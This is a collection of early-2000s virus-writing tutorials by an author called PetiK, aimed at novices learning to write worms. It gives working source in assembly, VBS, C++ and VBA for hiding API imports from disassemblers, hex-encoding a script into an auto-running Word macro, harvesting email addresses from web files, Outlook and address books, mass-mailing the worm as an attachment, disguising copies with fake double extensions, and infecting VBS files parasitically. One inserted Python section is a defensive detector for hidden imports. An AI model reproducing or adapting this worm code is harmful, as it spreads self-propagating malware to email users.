@lect:  pop esi
        push 23
        pop ecx
loop_lect:
        push ecx
        push esi
        api SetCurrentDirectoryA
        push 0
        @pushsz "winbackup.exe"
        push offset orig_worm
        api CopyFileA
        @endsz
        pop ecx
        loop loop_lect
end_spread_system:

end_worm:
        push 0
        api ExitProcess

.data
orig_worm db 50 dup (0)
lect      db 50 dup (0)

end start_worm
-----------------------source-----------------------

###########################################
#III:Extract API from KERNEL32.DLL library#
###########################################

A lot of disassemblers/debuggers (like W32DASM) can find the APIs used by a program, and a worm/virus/trojan is a program. With a normal program ("extrn API:proc"), the Import functions of W32DASM show:

KERNEL32.CloseHandle
KERNEL32.CreateFileA
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.WriteFile

A user who debugs the program can suspect that it creates or opens a file to write something. We can hide KERNEL32.CloseHandle, KERNEL32.CreateFileA and KERNEL32.WriteFile. How ?? By extracting the APIs from KERNEL32.DLL at run time.

code section
------------
First: Open KERNEL32.DLL:

        @pushsz "KERNEL32.DLL"
        api GetModuleHandleA
        xchg eax,ebx

Second: Use a macro to take the address of the APIs:

kern    macro x
        push offset sz&x
        push ebx
        api GetProcAddress
        mov _ptk&x,eax
        endm

Third: Extract the different APIs:

        kern CloseHandle
        kern CreateFileA
        kern WriteFile

Fourth: Use the APIs:

        call _ptkCloseHandle
        ...
        call _ptkCreateFileA
        ...
        call _ptkWriteFile

data section
------------
szCloseHandle   db "CloseHandle",0
szCreateFileA   db "CreateFileA",0
szWriteFile     db "WriteFile",0
_ptkCloseHandle dd ?
_ptkCreateFileA dd ?
_ptkWriteFile   dd ?

If we debug the program, the Import functions of W32DASM now show only:

KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress

-----------------------source-----------------------
.586p
.model flat
.code
JUMPS

api     macro a
        extrn a:proc
        call a
        endm

include Useful.inc

start_worm:
        @pushsz "KERNEL32.DLL"
        api GetModuleHandleA
        xchg eax,ebx

kern    macro x
        push offset sz&x
        push ebx
        api GetProcAddress
        mov _ptk&x,eax
        endm

        kern CloseHandle
        kern CreateFileA
        kern WriteFile

prep_spread_worm:
        push 0
        push 80h
        push 2
        push 0
        push 1
        push 40000000h
        @pushsz "C:\KernApi.txt"
        call _ptkCreateFileA
        xchg eax,ebx
        push 0
        push offset octets
        push e_txt - s_txt
        push offset s_txt
        push ebx
        call _ptkWriteFile
        push ebx
        call _ptkCloseHandle

.data
octets          dd ?
szCloseHandle   db "CloseHandle",0
szCreateFileA   db "CreateFileA",0
szWriteFile     db "WriteFile",0
_ptkCloseHandle dd ?
_ptkCreateFileA dd ?
_ptkWriteFile   dd ?
s_txt:          db 'Text file create with',CRLF
                db 'APIs extract from',CRLF
                db 'KERNEL32.DLL library',CRLF,CRLF
                db 9,'PetiK',CRLF
e_txt:

end start_worm
-----------------------source-----------------------

#############
#Conclusion:#
#############

If you have some questions or suggestions, please mail me at petikvx@multmania.com.
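The technique in part III is cheap to spot from the other side: the hidden names still sit in the .data section as plain strings (szCloseHandle and friends above), while the import table shrinks to the two resolvers. The following added example, not from the article, implements that triage heuristic over a declared import list and a section's raw bytes; SAMPLE_IMPORTS and SAMPLE_DATA are constructed to mirror the listing above.

```python
"""Flag binaries whose strings name APIs their import table does not (added example)."""
import re

# Imports a loader legitimately needs; a PE importing *only* these resolves the rest by hand.
RESOLVERS = {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
             "LoadLibraryA", "LoadLibraryW"}

# Names worth noticing when they appear as strings without a matching import.
WATCHED = {"CreateFileA", "WriteFile", "CloseHandle", "CopyFileA", "CreateFileMappingA",
           "WritePrivateProfileStringA", "WriteProfileStringA", "RegSetValueExA",
           "SHSetValueA", "URLDownloadToFileA", "WinExec", "CreateProcessA"}

# Printable ASCII runs of four or more bytes, like the 'strings' tool.
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")

# Constructed sample: what W32DASM would list for the part III source, and a
# .data section holding the sz* strings and the text the program writes.
SAMPLE_IMPORTS = ["GetModuleHandleA", "GetProcAddress"]
SAMPLE_DATA = (b"\x00\x00\x00\x00CloseHandle\x00CreateFileA\x00WriteFile\x00"
               b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
               b"Text file create with\r\nAPIs extract from\r\nKERNEL32.DLL library\r\n")


def ascii_strings(data):
    """All printable ASCII runs in a byte blob, in file order."""
    return [m.group().decode("ascii") for m in STRING_RE.finditer(data)]


def hidden_apis(imports, data):
    """Watched API names present as strings but absent from the import table."""
    return sorted((set(ascii_strings(data)) & WATCHED) - set(imports))


def classify(imports, data):
    """One-line verdict combining the import profile and the string scan."""
    declared = set(imports)
    hidden = hidden_apis(imports, data)
    if declared and declared <= RESOLVERS and hidden:
        return "run-time import resolution hides: " + ", ".join(hidden)
    if hidden:
        return "possible hidden imports: " + ", ".join(hidden)
    return "imports consistent with strings"


if __name__ == "__main__":
    print(classify(SAMPLE_IMPORTS, SAMPLE_DATA))
```

The same check extends naturally to any section dump; packed or string-obfuscated samples defeat it, which is why it is a ranking signal, not a verdict.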

=== VBS tutorial ===
=== by PetiK (05/05/2002) ===

################
# Introducion: #
################

I wrote this article after programming VBS.Xchange and VBS.Doublet (two VBS/DOC infectors). There are three parts in this article.

- Hex Conversion : How to convert an ascii file (a VBS into a module of Word for example).
- Spread with "mailto:" : spread a VBS worm with web files.
- Random Name Generator : To give each copy of a VBS worm/virii a new name at each start.

I succeeded in coding these without looking at other sources. This sort of article is of course not for good coderz but for the newbies (NOT LAMERZ) and all people who want to learn about WORM programming.

###################
# HEX CONVERSION: #
###################

Why convert a file to hexadecimal ?? For example to put it in a module of a Word document. How to do this ??

1) Set fso=CreateObject("Scripting.FileSystemObject")
   Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
   virus=fl.ReadAll                          ' Read all the file
   fl.Close

2) For i=1 To len(virus)                     ' Take the size of the file

3) e=Mid(virus,i,1)                          ' Take one byte after one.
   e=Hex(Asc(e))                             ' And convert in hexa. (P=50;e=65;...)

4) If Len(e)=1 Then                          ' If the hexa < 10h we add a 0
      e="0"&e                                ' Example : return (0Dh0Ah). We will have D and A.
   End If                                    ' So we add a 0 => 0D and 0A

5) f=f+e                                     ' This part is for the length of the line in the module
   If Len(f)=110 Then                        ' of the document (it doesn't support lines that are too long).
      sp.WriteLine "e = e + """+f+""""       ' Here we put 110 characters:
      f=""                                   ' e = e + "...110 char..."
   End If

6) If Len(virus)-i = 0 Then                  ' Here is for the last line if there are less than 110 chars :
      sp.WriteLine "e = e + """+f+""""       ' e = e + "... 1 < number of char < 110..."
      f=""
   End If

So the code source :
********************************************************************************
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close

set sp=fso.CreateTextFile("example_vbshex.txt",True,8)
sp.WriteLine "Attribute VB_Name = ""VirModule"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""

For i=1 To len(virus)

e=Mid(virus,i,1)
e=Hex(Asc(e))

If Len(e)=1 Then
e="0"&e
End If

f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If

If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If

Next

sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\newvbsfile.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\newvbsfile.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
********************************************************************************

And this is the result:
********************************************************************************
Attribute VB_Name = "VirModule"
Sub AutoOpen()
On Error Resume Next
e = ""
e = e + "4F6E204572726F7220526573756D65204E6578740D0A5365742066736F3D4372656174654F626A6563742822536372697074696E672E46"
e = e + "696C6553797374656D4F626A65637422290D0A53657420666C3D66736F2E4F70656E5465787446696C6528575363726970742E53637269"
e = e + "707446756C6C6E616D652C31290D0A76697275733D666C2E52656164416C6C0D0A666C2E436C6F73650D0A0D0A7365742073703D66736F"
e = e + "2E4372656174655465787446696C6528226578616D706C655F7662736865782E747874222C547275652C38290D0A73702E57726974654C"
e = e + "696E6520224174747269627574652056425F4E616D65203D2022225669724D6F64756C652222220D0A73702E57726974654C696E652022"
e = e + "537562204175746F4F70656E2829220D0A73702E57726974654C696E6520224F6E204572726F7220526573756D65204E657874220D0A73"
e = e + "702E57726974654C696E65202265203D2022222222220D0A0D0A466F7220693D3120546F206C656E287669727573290D0A0D0A653D4D69"
e = e + "642876697275732C692C31290D0A653D48657828417363286529290D0A0D0A4966204C656E2865293D31205468656E0D0A653D22302226"
e = e + "650D0A456E642049660D0A0D0A663D662B650D0A4966204C656E2866293D313130205468656E0D0A73702E57726974654C696E65202265"
e = e + "203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D0A4966204C656E287669727573292D69203D203020"
e = e + "5468656E0D0A73702E57726974654C696E65202265203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D"
e = e + "0A4E6578740D0A0D0A73702E57726974654C696E652022726561643D646563286529220D0A73702E57726974654C696E6520224F70656E"
e = e + "202222433A5C6E657776627366696C652E766273222220466F72204F7574707574204173202331220D0A73702E57726974654C696E6520"
e = e + "225072696E742023312C2072656164220D0A73702E57726974654C696E652022436C6F7365202331220D0A73702E57726974654C696E65"
e = e + "20225368656C6C2022227773637269707420433A5C6E657776627366696C652E7662732222220D0A73702E57726974654C696E65202245"
e = e + "6E6420537562220D0A73702E57726974654C696E652022220D0A73702E57726974654C696E65202246756E6374696F6E20646563286F63"
e = e + "746529220D0A73702E57726974654C696E652022466F72206865786164203D203120546F204C656E286F6374652920537465702032220D"
e = e + "0A73702E57726974654C696E652022646563203D20646563202620436872282222266822222026204D6964286F6374652C206865786164"
e = e + "2C20322929220D0A73702E57726974654C696E6520224E657874220D0A73702E57726974654C696E652022456E642046756E6374696F6E"
e = e + "220D0A73702E436C6F7365"
read=dec(e)
Open "C:\newvbsfile.vbs" For Output As #1
Print #1, read
Close #1
Shell "wscript C:\newvbsfile.vbs"
End Sub

Function dec(octe)
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
********************************************************************************

The function "dec" allows to convert in the opposite sense.

#########################
# SPREAD WITH "MAILTO:" #
#########################

Now we are going to see how to spread a VBS worm without the Windows AddressBook (aka WAB). If we can't use the WAB, we can read old mail and take the e-mail addresses, but too bad, I don't code this in VBS. Last solution: take the e-mail addresses from web files (htm, html, asp, etc...). When we see a link to send a mail by clicking, this is the code:

<A href="mailto:petikvx@aol.com">PetiKVX</A>
         -------
There is always this string : "MAILTO:". So! Fine! We can scan every file for this string and read the e-mail address.

1) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then   ' Take the good extension
                                                                        ' htm, html, asp, doc, xls
   set htm=fso.OpenTextFile(fil.path,1)                                 ' and open the file.
   verif=True
   allhtm=htm.ReadAll()                                                 ' Read all the file.
   htm.Close

2) For ml=1 To Len(allhtm)                                              ' Get the size.
   count=0

3) If Mid(allhtm,ml,7) = "mailto:" Then                                 ' Find the mailto: string.
      counter=counter+1
      mlto=""

4) Do While Mid(allhtm,ml+6+count,1) <> """"                            ' Scan the EMail until the '"' string.
      count=count+1
      mlto = mlto + Mid(allhtm,ml+6+count,1)
   loop

5) sendmailto(left(mlto,len(mlto)-1))                                   ' Send the mail

And now, the code:
********************************************************************************
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set mel=fso.CreateTextFile("spread_mailto.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit

Sub lect()
On Error Resume Next
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
End If
Next
End Sub

Sub spreadmailto(dir)
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFolder(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
set htm=fso.OpenTextFile(fil.path,1)
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
msgbox mlto
sendmailto(left(mlto,len(mlto)-1))
End If
Next
End If
Next
End Sub

Sub list(dir)
On Error Resume Next
Set f=fso.GetFolder(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub

Sub sendmailto(email)
Set out=CreateObject("Outlook.Application")
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Subject of worm"
mailmelto.Body "Body of worm"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub
********************************************************************************

In the spread_mailto.txt file we have this:
********************************************************************************
1 <Petikvx@aol.com>
2 <VBS.Ketip.A@mm>
3 <PetiK@aol.com>
4 <kavdaemon@relay.avp.ru>
5 <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>
<TR class=aolmailheader>
<TD noWrap vAlign=top width=>
6 <Pentasm99@aol.com>
7 <Pentasm99@aol.com screenname=>
...
...
********************************************************************************

We can see of course some problems:
- <VBS.Ketip.A@mm> : not a real EMail but a Norton worm name.
- <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>
  <TR class=aolmailheader>
  <TD noWrap vAlign=top width=> : The scan doesn't find the '"' string immediately.
- <Pentasm99@aol.com screenname=> : IDEM. The end of the mail was not '"' but a space (20h).

##########################
# RANDOM NAME GENERATOR: #
##########################

Like I said in my last article about "Hide a copy of a worm", we are going to do the same thing in VBS.

1) tmpname=""                                            ' Value of tmpname is NULL

2) randomize(timer)
   namel=int(rnd(1)*20)+1                                ' Random size of the first part of the name,
                                                         ' between 1 and 20.
3) For lettre = 1 To namel
      randomize(timer)
      tmpname=tmpname & chr(int(rnd(1)*26)+97)           ' Put the letter.
   Next                                                  ' 97 : Start from "a" (65 : Start from "A")
                                                         ' 26 : from "a-A" to "z-Z"
                                                         ' for numbers 26 => 9 and 97 => 48

4) typext = "execombatbmpjpggifdocxlsppthtmhtthta"
   randomize(timer)
   tmpext = int(rnd(1)*11)+1                             ' Now we choose an extension among 12 different ones.

5) tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"   ' And we have the result

Code Source:
********************************************************************************
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
MsgBox tmpname
********************************************************************************

Some Examples:
mhrmhoulleyl.htm.vbs
rlvqmtyppjcbho.bat.vbs
PREYXUDBNYKNLRSALL.DOC.VBS
869768177527247364.gif.vbs
...
...

This technique is handy for changing the name of the worm's copy at each start (look at my last article).

###############
# CONCLUSION: #
###############

This is the end of the article. I hope that it helps you in your creations and research. If you have any suggestions or comments, please mail me at petikvx@aol.com

PetiK (www.petikvx.fr.fm)

=== Three ways of spread === === by PetiK (05/20/2002) ===

################ # Introducion: # ################ I present in this article the tree mains ways that I use to spread my worms.

############## # Read Mail: # ############## I use this first way to code a worm in C++. It is a simple syntax. For this we use MAPI function : FindNext, ReadMail, SendMail and FreeBuffer First of all "prepare" the APIs : ULONG ULONG ULONG ULONG ULONG ULONG (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mFreeBuffer)(LPVOID);

Then "call" the APIs : hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); And at the end the syntax to read the mail, take email and send the mail : // Initialize MAPI mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); // Find the first mail if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { // Read the mail if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { // Here we take the "name" and the "email" of the guy who send the mail strcpy(mname,mes->lpOriginator->lpszName); strcpy(maddr,mes->lpOriginator->lpszAddress); mes->ulReserved=0; mes->lpszSubject="Subject of worm"; mes->lpszNoteText="Body of Worm."; mes->lpszMessageType=NULL; mes->lpszDateReceived=NULL; mes->lpszConversationID=NULL; mes->flFlags=MAPI_SENT; mes->lpOriginator->ulReserved=0; mes->lpOriginator->ulRecipClass=MAPI_ORIG; mes->lpOriginator->lpszName=mes->lpRecips->lpszName; mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; mes->nRecipCount=1; mes->lpRecips->ulReserved=0; mes->lpRecips->ulRecipClass=MAPI_TO; // Here is the new email mes->lpRecips->lpszName=mname; mes->lpRecips->lpszAddress=maddr; mes->nFileCount=1; mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); mes->lpFiles->ulReserved=0;

mes->lpFiles->flFlags=NULL; mes->lpFiles->nPosition=-1; mes->lpFiles->lpszPathName="C:\WINDOWS\worm.exe"; mes->lpFiles->lpszFileName="othername.exe"; mes->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mes, NULL, NULL); } // Find the next mail }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mes->lpFiles); mFreeBuffer(mes); // Close MAPI mLogoff(session,0,0,0); FreeLibrary(hMAPI); } I you can use this function in VBS (or VB), very good (and mail me). ************************************************************************************************ ##################### # "mailto:" string: # ##################### I'm going to explain how use this way in 3 differents languages {Win32Asm} I took the code from my worm I-Worm.Gamma 1st: Open the file call inc je dec xchg 2nd: CreateFileA eax END_S eax eax,ebx

Map the File push push push call test jz PAGE_READONLY 0 ebx CreateFileMappingA eax,eax FERME1 FILE_MAP_READ ebp MapViewOfFile eax,eax FERME2 eax,esi

3rd: push push call test jz xchg

ls_s_m: call @mt db 'mailto:' @mt: pop edi l_s_m: pushad push 07h pop ecx rep cmpsb popad je s_m inc esi loop l_s_m FERME3: push esi call UnmapViewOfFile FERME2: push ebp call CloseHandle FERME1: push ebx call CloseHandle popad

; We compare 7 bytes with "mailto:" string

ret s_m: xor edx,edx add esi,7 mov edi,offset mail_address ; and we stock the email in the push edi ; mail_address offset = EDI lodsb cmp al,' ' je s_c cmp al,'"' ; If charachter = " je e_c cmp al,'''' ; or charachter = ', it is the end of the mail je e_c cmp al,'@' ; control if exists @ jne o_a inc edx stosb jmp n_c inc esi jmp n_c xor al,al stosb pop edi test edx,edx ; no @ ?? no valid email. je other_file

n_c:

o_a: s_c: e_c:

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

{C++}

In C++, there are three parts.

First : FindFile

  hFile=FindFirstFile(ext,&ffile);
  if(hFile!=INVALID_HANDLE_VALUE)
  {
    while(abc)
    {
      GetMail(ffile.cFileName,mail);
      if(strlen(mail)>0)
      {
        sendmail(mail);
      }
      abc=FindNextFile(hFile,&ffile);
    }
  }

Second : Get the EMail

  void GetMail(char *namefile, char *mail)
  {
    hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
    if(hf==INVALID_HANDLE_VALUE) return;                  // Like in Win32Asm :
    size=GetFileSize(hf,NULL);                            // Open File
    if(!size) return;                                     // Empty ?? Close it
    size-=100;                                            // NO COMMENTS !
    hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
    if(!hf2)
    {
      CloseHandle(hf);                                    // Map the file
      return;
    }
    mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
    if(!mapped)
    {
      CloseHandle(hf2);
      CloseHandle(hf);
      return;
    }
    i=0;
    while(i<size && !test)
    {
      if(!strncmpi("mailto:",mapped+i,strlen("mailto:")))  // If "mailto:" string exists ??
      {
        test=TRUE;
        i+=strlen("mailto:");
        k=0;
        while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127)   // Until " or ' character
        {
          if(mapped[i]!=' ')
          {
            mail[k]=mapped[i];
            k++;
            if(mapped[i]=='@')                            // Check @ character
              valid=TRUE;
          }
          i++;
        }
        mail[k]=0;                                        // and stock email in mail offset
      }
      else i++;
    }
    if(!valid) mail[0]=0;
    UnmapViewOfFile(mapped);
    CloseHandle(hf2);
    CloseHandle(hf);
    return;
  }

Third : Send the mail

  void sendmail(char *tos)
  {
    memset(&mess,0,sizeof(MapiMessage));
    memset(&from,0,sizeof(MapiRecipDesc));
    from.lpszName=NULL;
    from.ulRecipClass=MAPI_ORIG;
    mess.lpszSubject="Subject of mail";
    mess.lpszNoteText="Body of mail";
    mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
    if(!mess.lpRecips) return;
    memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
    mess.lpRecips->lpszName=tos;                          // Here the mail that we found
    mess.lpRecips->lpszAddress=tos;
    mess.lpRecips->ulRecipClass=MAPI_TO;
    mess.nRecipCount=1;
    mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
    if(!mess.lpFiles) return;
    memset(mess.lpFiles,0,sizeof(MapiFileDesc));
    mess.lpFiles->lpszPathName="FullName_of_the_worm.exe";
    mess.lpFiles->lpszFileName="othername_of_worm.exe";
    mess.nFileCount=1;
    mess.lpOriginator=&from;
    mSendMail(0,0,&mess,0,0);                             // Send the mail
    free(mess.lpRecips);
    free(mess.lpFiles);
  }

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

{VBS}

Look at my article "VBS Tutorial"

************************************************************************************************

########################
# Outlook Address Book #
########################

{Win32Asm}

In the virus/worm Win32.HiV, Benny scans the default WAB file to spread. But it was a little difficult for me, so I coded it differently.

To get the path of the WAB file:

srch_wab:
        mov     edi,offset wab_path
        push    offset wab_size           ; = fullname of WAB file
        push    edi
        push    offset reg
        push    0
        @pushsz "Software\Microsoft\Wab\WAB4\Wab File Name"   ; The name of WAB file
        push    80000001h
        api     SHGetValueA

To open and map the file, do like for the HTM and HTML file (see on top). Now, scan the file:

d_scan_mail:
        call    @smtp
        db      'SMTP',00h,1Eh,10h,56h,3Ah   ; the string we want to find
@smtp:  pop     edi
s_scan_mail:
        pushad
        push    9
        pop     ecx
        rep     cmpsb
        popad
        je      scan_mail
        inc     esi
        loop    s_scan_mail
        ....
scan_mail:
        xor     edx,edx
        add     esi,21
        mov     edi,offset mail_addr      ; EDI = EMail
        push    edi
p_c:    lodsb
        cmp     al," "
        je      car_s
        cmp     al,00h
        je      f_mail
        cmp     al,"@"
        jne     not_a
        inc     edx
not_a:  stosb
        jmp     p_c
car_s:  inc     esi
        jmp     p_c
f_mail: xor     al,al
        stosb
        pop     edi
        test    edx,edx
        je      d_scan_mail
        call    send_mail
        jmp     d_scan_mail

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

{VBA}

I took the code from W97M.Melissa.A:

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If UngaDasOutlook = "Outlook" Then
  DasMapiName.Logon "profile", "password"
  For y = 1 To DasMapiName.AddressLists.Count
    Set AddyBook = DasMapiName.AddressLists(y)
    x = 1
    Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
    For oo = 1 To AddyBook.AddressEntries.Count
      Peep = AddyBook.AddressEntries(x)
      BreakUmOffASlice.Recipients.Add Peep
      x = x + 1
      If x > 50 Then oo = AddyBook.AddressEntries.Count
    Next oo
    BreakUmOffASlice.Subject = "Subject of the worm"
    BreakUmOffASlice.Body = "Body of the Worm"
    BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
    BreakUmOffASlice.Send
    Peep = ""
  Next y
  DasMapiName.Logoff
End If

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

{VBS}

I took the code from VBS.StarMania:

Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
  If AL.AddressEntries.Count <> 0 Then
    For AddListCount = 1 To AL.AddressEntries.Count
      Set ALE = AL.AddressEntries(AddListCount)
      Set go = O.CreateItem(0)
      go.To = ALE.Address
      go.Subject = "GUESS"
      go.Body = "GUESS"
      go.Attachments.Add(WScript.ScriptFullName)
      go.DeleteAfterSubmit = True
      go.Send

************************************************************************************************

###############
# Conclusion: #
###############

This is the end of this article. If you have some questions or suggestions, please mail me to petikvx@aol.com

PetiK (www.petikvx.fr.fm)

=== What language for which work ?? ===
=== by PetiK (06/02/2002) ===

#################
# Introduction: #
#################

Often new coders (like newbies) ask themselves what the best language is to code viruses and worms. So I try to present the different languages that I use to code my works. First I present the compiled languages (Win32Asm - C/C++ - VB) and second the script languages.

################
# 1) Win32asm: # THE BEST
################

It's by far the best way to code viruses/worms. You can control everything with it. This language is useful for a good infection. Today, 98 % of virii are coded in assembler. There are different ways to spread worms too. First, the MAPI functions. Look at my works (and others) to see the syntax. Other way : SMTP. It's a good device to deceive the victims. They can believe that an email comes from a company (support@microsoft.com) or from themselves. But it is a difficult language in the beginning. See, read and learn tutorials and other virii/worms' source.

#############
# 2) C/C++: #
#############

I learnt this language 6 months ago. Advantage: the syntax is as easy as ASM. It's especially a language to code worms, thanks to <mapi.h>. You can spread your work by reading old mails or scanning some WEB files, but also by coding an SMTP process. This language is also used to code worms that use the IIS server to spread, like the worm W32.Nimda.Worm. With this language, you can code Linux virii/worms too.

##########
# 3) VB: #
##########

Of course it's a lame language. But you can use Outlook's Address Book to spread your work without effort. But this sort of program is quickly detected by AV (Norton : Bloodhound.W32.VBWORM). Personally, I use this language to code some tools like Virii/Worms Generators or other things.

###########
# 4) VBS: #
###########

Very easy. I learnt this language by reading the source of VBS.ILoveYou.Worm. You can easily make a good parasitic virus and worm with Outlook's Address Book. Remark : VBS is a Micro$oft language. So you can travel through different Micro$oft software like Outlook (of course) but also Word. If you want to read good source coded in VBS, look at Zulu's homepage.

############
# 5) HTML: #
############

With this language, the most interesting are the virii. Of course you code in VBS language (or in JavaScript). This is the same syntax. Try to find a new sort of spreading.

###########
# 6) VBA: #
###########

If you know the VBS language, you won't have problemz coding a macro virus (DOC / XLS). Coding macro virii is the easiest thing in the VX life. So you must find novelties (new ways to infect DOC files, infect DOC/XLS files or spread through DOC/EXE files, etc...). Spreading is easy too : Melissa.A.

###############
# Conclusion: #
###############

This is the end of this article. If you have some questions or suggestions, please mail me to petikvx@aol.com

PetiK (www.petikvx.fr.fm)

=== VBS/HTML multi-infection ===
=== by PetiK (06/19/2002) ===

#################
# Introduction: #
#################

This article presents how to travel between VBS and HTML files to infect them. There are 4 chapters :

I:   VBS -> VBS
II:  VBS -> HTML
III: HTML-> HTML
IV:  HTML-> VBS

#################
# I: VBS -> VBS #
#################

We can frequently see this in VBS viruses. There are two sorts of infection:

-Overwriting :
   % Too bad, the user sees the problem immediately
   % Crashes the VBS file
   So this solution is not very good.

-Parasitic :
   % Start of the file :

      **********************
      * 'mark of the virus *
      *                    *
      *          +         *
      *                    *
      *     VBS virus      *
      **********************
      *                    *
      *   Real VBS prog    *
      *                    *
      **********************

   % End of the file :

      **********************
      * 'mark of the virus *
      **********************
      *                    *
      *   Real VBS prog    *
      *                    *
      **********************
      *                    *
      *     VBS virus      *
      *                    *
      **********************

So we're going to see the code :

'mark
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set fl = fso.OpenTextFile(WScript.ScriptFullName, 1)
virus = fl.ReadAll                                        ' Stock the virus code
fl.Close
infectfile()

Sub infectfile()
  On Error Resume Next
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set drv = fso.Drives                                    ' Get the drive
  For Each d In drv
    If d.DriveType = 2 Or d.DriveType = 3 Then
      list(d.path&"\")
    End If
  Next
End Sub

